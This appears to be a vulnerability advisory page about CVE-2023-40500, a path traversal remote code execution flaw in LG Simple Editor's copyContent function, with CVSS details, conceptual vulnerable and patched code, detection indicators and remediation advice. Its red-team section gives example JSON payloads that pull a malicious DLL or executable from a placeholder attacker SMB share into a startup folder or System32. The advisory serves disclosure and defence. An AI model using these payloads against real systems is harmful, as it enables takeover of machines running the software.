CVE-2023-40500
Executive Summary
CVE-2023-40500 is a critical Remote Code Execution (RCE) vulnerability in LG Simple Editor, a software utility used for editing LG device configurations. The flaw resides in the copyContent command, which fails to properly validate user-supplied paths before performing file operations. This allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges on affected installations. With a CVSS score of 9.8, this vulnerability poses an extreme risk to any organization using LG Simple Editor, especially in environments where the software is exposed to the internet or untrusted networks. No public exploit code or patch is currently available, making detection and mitigation critical.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

CVSS Breakdown & Threat Level
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: None (UI:N)
- Scope: Unchanged (S:U)
- Confidentiality Impact: High (C:H)
- Integrity Impact: High (I:H)
- Availability Impact: High (A:H)
- Threat Level: Critical – Immediate action required. The vulnerability is remotely exploitable without authentication, and successful exploitation leads to full system compromise.
Deep Dive & Mechanics
The vulnerability exists in the copyContent function of LG Simple Editor. This function is designed to copy files or directories from a source path to a destination path. However, the implementation lacks proper validation of the user-supplied path parameter. Specifically, the function does not sanitize or restrict path traversal sequences (e.g., ../) or symbolic links. An attacker can craft a malicious request that specifies a path pointing to a system-critical file (e.g., a DLL or executable) and then overwrite it with attacker-controlled content. Alternatively, the attacker can copy a malicious file to a startup directory or scheduled task location, achieving code execution on the next system restart or trigger.
The vulnerability is classified under CWE-22 (Improper Limitation of a Pathname to a Restricted Directory), commonly known as Path Traversal. The lack of authentication and the high privileges (SYSTEM) make this especially dangerous.
Vulnerable vs. Patched Code
Since no patch is available, the vulnerable code is the current production version. The following is a conceptual representation of the vulnerable and a hypothetical patched version.
Vulnerable Code (Conceptual):
def copyContent(source, destination):
# No validation of source or destination paths
shutil.copy2(source, destination)
Patched Code (Hypothetical):
import os
ALLOWED_BASE = "/safe/directory/"
def copyContent(source, destination):
# Resolve and validate paths
abs_source = os.path.abspath(source)
abs_dest = os.path.abspath(destination)
if not abs_source.startswith(ALLOWED_BASE) or not abs_dest.startswith(ALLOWED_BASE):
raise PermissionError("Path not allowed")
shutil.copy2(abs_source, abs_dest)
Exploitation & Lab Setup
Red Team
Prerequisites:
- A target running LG Simple Editor with the
copyContentendpoint exposed. - No authentication required.
Exploitation Steps:
- Identify the vulnerable endpoint (e.g.,
http://target:port/copyContent). - Craft a POST request with a path traversal payload to overwrite a system file.
- Example payload to copy a malicious DLL to the startup folder:
POST /copyContent HTTP/1.1 Host: target Content-Type: application/json { "source": "\\\\attacker\\share\\malicious.dll", "destination": "C:\\Users\\Public\\Startup\\malicious.dll" } - Alternatively, overwrite a system service binary:
{ "source": "\\\\attacker\\share\\evil.exe", "destination": "C:\\Windows\\System32\\legit_service.exe" } - Trigger execution (e.g., reboot or service restart).
Note: No public exploit code is available; this is a conceptual demonstration.
Blue Team
Detection & Prevention:
- Monitor for unusual file copy operations, especially to system directories.
- Use application whitelisting to prevent unauthorized binaries from executing.
- Implement network segmentation to isolate LG Simple Editor from untrusted networks.
- Deploy a WAF rule to block path traversal patterns in requests.
Lab Setup:
- Install LG Simple Editor in a sandboxed VM.
- Use a tool like Burp Suite to send crafted requests.
- Monitor file system changes with Sysmon or similar.
Indicators of Compromise (IOCs)
- Network IOCs:
- POST requests to
/copyContentwith JSON payloads containingsourceanddestinationfields. - Outbound SMB connections to attacker-controlled shares (if using UNC paths).
- POST requests to
- File System IOCs:
- Unexpected files in
C:\Users\Public\Startup\,C:\Windows\System32\, or other system directories. - New scheduled tasks or services pointing to unusual executables.
- Unexpected files in
- Process IOCs:
LGSimpleEditor.exespawningcmd.exeorpowershell.exe.- Unusual child processes from
LGSimpleEditor.exe.

Remediation & Mitigation
- Immediate: Disable or remove LG Simple Editor from all systems if not essential.
- Network: Block inbound/outbound traffic to the LG Simple Editor port (if known) at the firewall.
- Access Control: Ensure the software is not exposed to the internet; restrict access to trusted IPs only.
- Monitoring: Implement the detection rules above to identify exploitation attempts.
- Vendor: Contact LG for an official patch; monitor LG’s security advisories.
- Compensating Controls: Use application control (e.g., AppLocker) to prevent unauthorized code execution.
